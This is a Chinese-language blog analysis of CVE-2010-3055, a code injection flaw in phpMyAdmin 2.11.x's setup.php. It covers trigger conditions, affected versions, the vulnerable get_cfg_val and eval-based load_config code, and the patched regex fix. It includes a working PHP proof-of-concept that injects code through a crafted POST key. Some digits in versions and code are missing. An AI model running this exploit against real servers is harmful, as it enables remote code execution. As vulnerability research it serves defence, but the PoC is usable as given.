phpMyadmin /scripts/setup.php Execute Arbitrary PHP Code Via A Crafted POST Request CVE-2010-3055
目录
. 漏洞描述
. 漏洞触发条件
. 漏洞影响范围
. 漏洞代码分析
. 防御方法
. 攻防思考
1. 漏洞描述
The configuration setup script (aka scripts/setup.php) in phpMyAdmin 2.11.x before 2.11.10.1 does not properly restrict key names in its output file, which allows remote attackers to execute arbitrary PHP code via a crafted POST request.
简单地概括这个漏洞如下
. \scripts\setup.php文件会接收用户的POST数据进行配置文件的键值(key-value)赋值,并将结果写入/config/config.inc.php文件
. 代码对用户的输入没有进行有效的过滤,导致黑客可以采用"注入拼接技术",在原本的key-value赋值的"中间",拼接一段任意代码执行
. \scripts\setup.php文件在点击load(也就是用户点击查看配置文件)的时候,采用eval(..的方式进行"变量本地注册",即重新执行一次变量赋值
. 在eval的过程中,之前黑客注入的任何代码,被eval执行了,导致了最终的代码执行
Relevant Link:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3055
http://threats.io/cve/CVE-2010-3055/
2. 漏洞触发条件
. phpmyadmin下的config文件夹存在
这点和CVE--1151是一样的,setup.php本身不能创建新的目录 . config文件夹、config.inc.php文件可写 . 代码本身存在输入过滤漏洞
0x1: 测试POC
POC的发起需要附带对应的token,在手工测试的时候需要注意这点
<?php
// this is an exploit code for phpMyAdmin 2.11.10 $target_url = "http://host/path/phpmyadmin/script/setup.php"; $token = null; // request 1:获取token
$res = get_response(); // request 2 (add server)
$res = get_response('POST', "token=$token&action=addserver"); // request 3 (save to session)
$res = get_response('POST', "token=$token&action=addserver_real&host=localhost&connect_type=tcp&extension=mysql&auth_type=config&user=root&password=1&submit_save=Add&AllowDeny_order=1&AllowDeny[a][b]['.phpinfo().']=1"); // request 4 (save to file)
$res = get_response('POST', "token=$token&action=save"); // request 5 (load file)
$res = get_response('POST', "token=$token&action=load");
var_dump($res); function get_response($method='GET', $body=null) {
global $target_url, $token;
static $ch = null; if ($ch === null) $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $target_url); if ($method == 'POST') {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
} curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookie.txt'); $res = curl_exec($ch);
$token = get_token($res); return $res;
} function get_token($s) {
if (preg_match('#name="token" value="(.*?)"#', $s, $m)) {
return $m[];
}
}
Relevant Link:
http://forum.antichat.ru/printthread.php?t=239845
3. 漏洞影响范围
phpMyAdmin phpMyAdmin 2.11.
phpMyAdmin phpMyAdmin 2.11.
phpMyAdmin phpMyAdmin 2.11. .
phpMyAdmin phpMyAdmin 2.11. .
phpMyAdmin phpMyAdmin 2.11. .
phpMyAdmin phpMyAdmin 2.11.
phpMyAdmin phpMyAdmin 2.11.
phpMyAdmin phpMyAdmin 2.11.
phpMyAdmin phpMyAdmin 2.11.
phpMyAdmin phpMyAdmin 2.11.
phpMyAdmin phpMyAdmin 2.11.
phpMyAdmin phpMyAdmin 2.11.9.5.
phpMyAdmin phpMyAdmin 2.11.9.5
phpMyAdmin phpMyAdmin 2.11.9.3
phpMyAdmin phpMyAdmin 2.11.8.1
phpMyAdmin phpMyAdmin 2.11.5.2
phpMyAdmin phpMyAdmin 2.11.5.1
phpMyAdmin phpMyAdmin 2.11.2.2
phpMyAdmin phpMyAdmin 2.11.2.1
phpMyAdmin phpMyAdmin 2.11.-dev
phpMyAdmin phpMyAdmin 2.11.1.2
phpMyAdmin phpMyAdmin 2.11.1.1
MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 4.0
Gentoo Linux
Debian Linux 5.0 sparc
Debian Linux 5.0 s/
Debian Linux 5.0 powerpc
Debian Linux 5.0 mipsel
Debian Linux 5.0 mips
Debian Linux 5.0 m68k
Debian Linux 5.0 ia-
Debian Linux 5.0 ia-
Debian Linux 5.0 hppa
Debian Linux 5.0 armel
Debian Linux 5.0 arm
Debian Linux 5.0 amd64
Debian Linux 5.0 alpha
Debian Linux 5.0
Relevant Link:
http://www.securityfocus.com/bid/42591
4. 漏洞代码分析
这个漏洞的利用需要分几步,我们分为注入和利用2步来分析代码中存在的漏洞
0x1: 注入
function get_cfg_val($name, $val)
{
global $crlf; $ret = '';
if (is_array($val))
{
$ret .= $crlf;
foreach ($val as $k => $v)
{
if (!isset($type))
{
if (is_string($k))
{
$type = 'string';
}
elseif (is_int($k))
{
$type = 'int';
$ret .= $name . ' = array(' . $crlf;
}
else
{
// Something unknown...
$ret .= $name. ' = ' . PMA_var_export($val) . ';' . $crlf;
break;
}
}
if ($type == 'string')
{ //如果没有对用户的输入进行转义、过滤、规范化,则会存在拼接型注入的风险
$ret .= get_cfg_val($name . "['$k']", $v);
}
elseif ($type == 'int')
{
$ret .= ' ' . PMA_var_export($v) . ',' . $crlf;
}
}
if (!isset($type))
{
/* Empty array */
$ret .= $name . ' = array();' . $crlf;
}
elseif ($type == 'int')
{
$ret .= ');' . $crlf;
}
$ret .= $crlf;
unset($type);
}
else
{
$ret .= $name . ' = ' . PMA_var_export($val) . ';' . $crlf;
}
return $ret;
}
0x2: 利用
...
case 'load':
if ($fail_dir) {
message('error', 'Reading of configuration disabled because of permissions.');
break;
}
//载入配置文件
$new_cfg = load_config('./config/config.inc.php');
if (!($new_cfg === FALSE)) {
$_SESSION['configuration'] = $new_cfg;
}
$show_info = TRUE;
break;
...
load_config()
function load_config($config_file)
{
if (file_exists($config_file))
{
$success_apply_user_config = FALSE;
$old_error_reporting = error_reporting();
//直接使用eval对配置文件中的key-value进行"变量本地注册",黑客可以采用拼接的方式,在eval即将执行的字符串中拼接入任意代码,从而导致远程代码执行
if (function_exists('file_get_contents'))
{
$success_apply_user_config = eval('?>' . trim(file_get_contents($config_file)));
}
else
{
$success_apply_user_config = eval('?>' . trim(implode("\n", file($config_file))));
}
error_reporting($old_error_reporting);
unset($old_error_reporting);
if ($success_apply_user_config === FALSE)
{
message('error', 'Error while parsing configuration file!');
}
elseif (!isset($cfg) || count($cfg) == )
{
message('error', 'Config file seems to contain no configuration!');
}
else
{
// This must be set
if (!isset($cfg['Servers']))
{
$cfg['Servers'] = array();
}
message('notice', 'Configuration loaded');
compress_servers($cfg);
return $cfg;
}
}
else
{
message('error', 'Configuration file not found!');
}
return FALSE;
}
Relevant Link:
http://sourceforge.net/p/phpmyadmin/bugs/3081/
5. 防御方法
function get_cfg_val($name, $val)
{
global $crlf; $ret = '';
if (is_array($val))
{
$ret .= $crlf;
foreach ($val as $k => $v)
{
if (!isset($type))
{
if (is_string($k))
{
$type = 'string';
}
elseif (is_int($k))
{
$type = 'int';
$ret .= $name . ' = array(' . $crlf;
}
else
{
// Something unknown...
$ret .= $name. ' = ' . PMA_var_export($val) . ';' . $crlf;
break;
}
}
if ($type == 'string')
{
//防御代码
$k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);
//如果没有对用户的输入进行转义、过滤、规范化,则会存在拼接型注入的风险
$ret .= get_cfg_val($name . "['$k']", $v);
}
elseif ($type == 'int')
{
$ret .= ' ' . PMA_var_export($v) . ',' . $crlf;
}
}
if (!isset($type))
{
/* Empty array */
$ret .= $name . ' = array();' . $crlf;
}
elseif ($type == 'int')
{
$ret .= ');' . $crlf;
}
$ret .= $crlf;
unset($type);
}
else
{
$ret .= $name . ' = ' . PMA_var_export($val) . ';' . $crlf;
}
return $ret;
}
在输入的检测中,使用正则进行了"规范化",将输入的key限定在数字和字母的范围之中,有效地防御了这个代码执行漏洞
Relevant Link:
https://github.com/phpmyadmin/phpmyadmin/commit/30c83acddb58d3bbf940b5f9ec28abf5b235f4d2
6. 攻防思考
暂无
Copyright (c) 2014 LittleHann All rights reserved
phpMyadmin /scripts/setup.php Execute Arbitrary PHP Code Via A Crafted POST Request CVE-2010-3055的更多相关文章
- phpMyadmin /scripts/setup.php Execute Arbitrary PHP Code Via unserialize Vul Object Injection PMASA-2010-4
目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 对这个漏洞简单的概括如下 . "/scripts/setup.php&q ...
- phpMyadmin /scripts/setup.php Remote Code Injection && Execution CVE-2009-1151
目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Insufficient output sanitizing when gener ...
- phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)
phpmyadmin 2.x版本 POST /scripts/setup.php HTTP/1.1 Host: 192.168.49.2:8080 Accept-Encoding: gzip, def ...
- mvn deploy 报错:Return code is: 400, ReasonPhrase: Bad Request. ->
mvn deploy 报错:Return code is: 400, ReasonPhrase: Bad Request. -> TEST通过没有报错,但是最终部署到Nexus中时出现错误. 后 ...
- maven deploy Return code is: 400, ReasonPhrase: Bad Request.
最近在自己本地deploy jar 到本地 nexus的时候,报错 Return code is: 400, ReasonPhrase: Bad Request. 解决思路: 1.查看maven pr ...
- 解决 android studio 出现:"AndroidStudio:Could not GET 'https://dl.google.com Received status code 400 from server: Bad Request"问题
一.android studio 编译项目时出现"AndroidStudio:Could not GET 'https://dl.google.com Received status cod ...
- Android Studio Gradle build 报错:Received status code 400 from server: Bad Request
错误提示如下 Could not GET 'https://dl.google.com/dl/android/maven2/com/android/tools/build/gradle/3.1.2/ ...
- Python pip install Twisted 出错“Command "c:\python37\python.exe -u -c "import setuptools, tokenize;__file__='C:...\\Twisted\\setup.py'.... failed with error code 1 in C:... \\Twisted"
如标题所说: python版本是目前最新的3.7.1 结果发现并不是环境问题,而是直接 pip install Twisted 安装的包不兼容 需要手动下载兼容的扩展包Twisted-18.9.0-c ...
- VS Code 中使用 GitHub pull request 插件提交代码
VS Code作为一个代码编辑器,受到很多人的喜爱:其中有很多非常有用的插件/扩展功能,也会极大的提高我们的工作效率. 这里介绍一下GitHub pull request,用来向GitHub提交在VS ...
随机推荐
- web学习第一章
web学习第一章 我是大概9月10日开始走上IT之路的,一开始学习了小段时间的自动化办公软件, 昨天我开始学习客户端网页编程,我了解什么是WEB,一些比较老古董的计算模式和发展历史,印象最让我深刻 ...
- 全球第一本基于Bootstrap V3.x的图书《深入理解Bootstrap》终于上市了,再次免费送书15本【活动结束】
先说活动规则,再说书的事 经过将近1年的努力,终于有了第一本自己独立编写的书:<深入理解Bootstrap>,基于最新版V 3.1 ,侧重于源码详解.架构分析.插件扩展(全新开发)实战.为 ...
- 操作文件方法简单总结(File,Directory,StreamReader,StreamWrite )
对于文件夹,文档的操作一直处于一知半解状态,有时间闲下来了,好好练习了一把,对文档,文件的操作有了一个基本的认知, 若要深入了解,还是得通过实际的项目才行了,好了废话不多说,上酸菜!! 注:红色标题为 ...
- C#微信开发小白成长教程二(新手接入指南,附视频)
距离第一讲又已经过去了一个多星期了,本打算一周更新一讲的,奈何实在太忙.最近也在群里发现有一部分人已经可以熟练调用微信的部分接口但却不是很清楚微信公众平台接收消息的一个处理机制.本讲就来介绍下怎么接入 ...
- Linux之我见
Linux哲学之美 linux就像是一个哲学的最佳实践.如果非要对它评价,我真的不知道该怎么赞叹,我只能自豪的说着:“linux的美丽简直让人沉醉.” 我只能说是我处在linux学习的修炼之路上的一个 ...
- Oracle中修改表名遇到“ORA-00054: 资源正忙, 但指定以 NOWAIT 方式获取资源, 或者超时失效”
Oracle 11g中想修改表名: rename ASSETPORJECT to ASSETPROJECT; 结果提示:ORA-00054: 资源正忙, 但指定以 NOWAIT 方式获取资源, 或者超 ...
- android之拍照与摄像
拍照和摄像的意图很简答,这里直接贴代码 布局文件 <?xml version="1.0" encoding="utf-8"?> <Linear ...
- Service之来电监听(失败的案例)
Service:服务,可以理解成一个运行再后台没有界面的Activity,集成于Seriver,是四大组件之一 Service的继承关系:Service-->ContextWrapper--&g ...
- BroadcastReceiver之有序广播
有序广播可以按一定的优先级进行传播 首先进行发送广播 public void click(View v){ Intent intent = new Intent(); intent.setAction ...
- [AJAX系列]XMLHttpRequest请求
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8&quo ...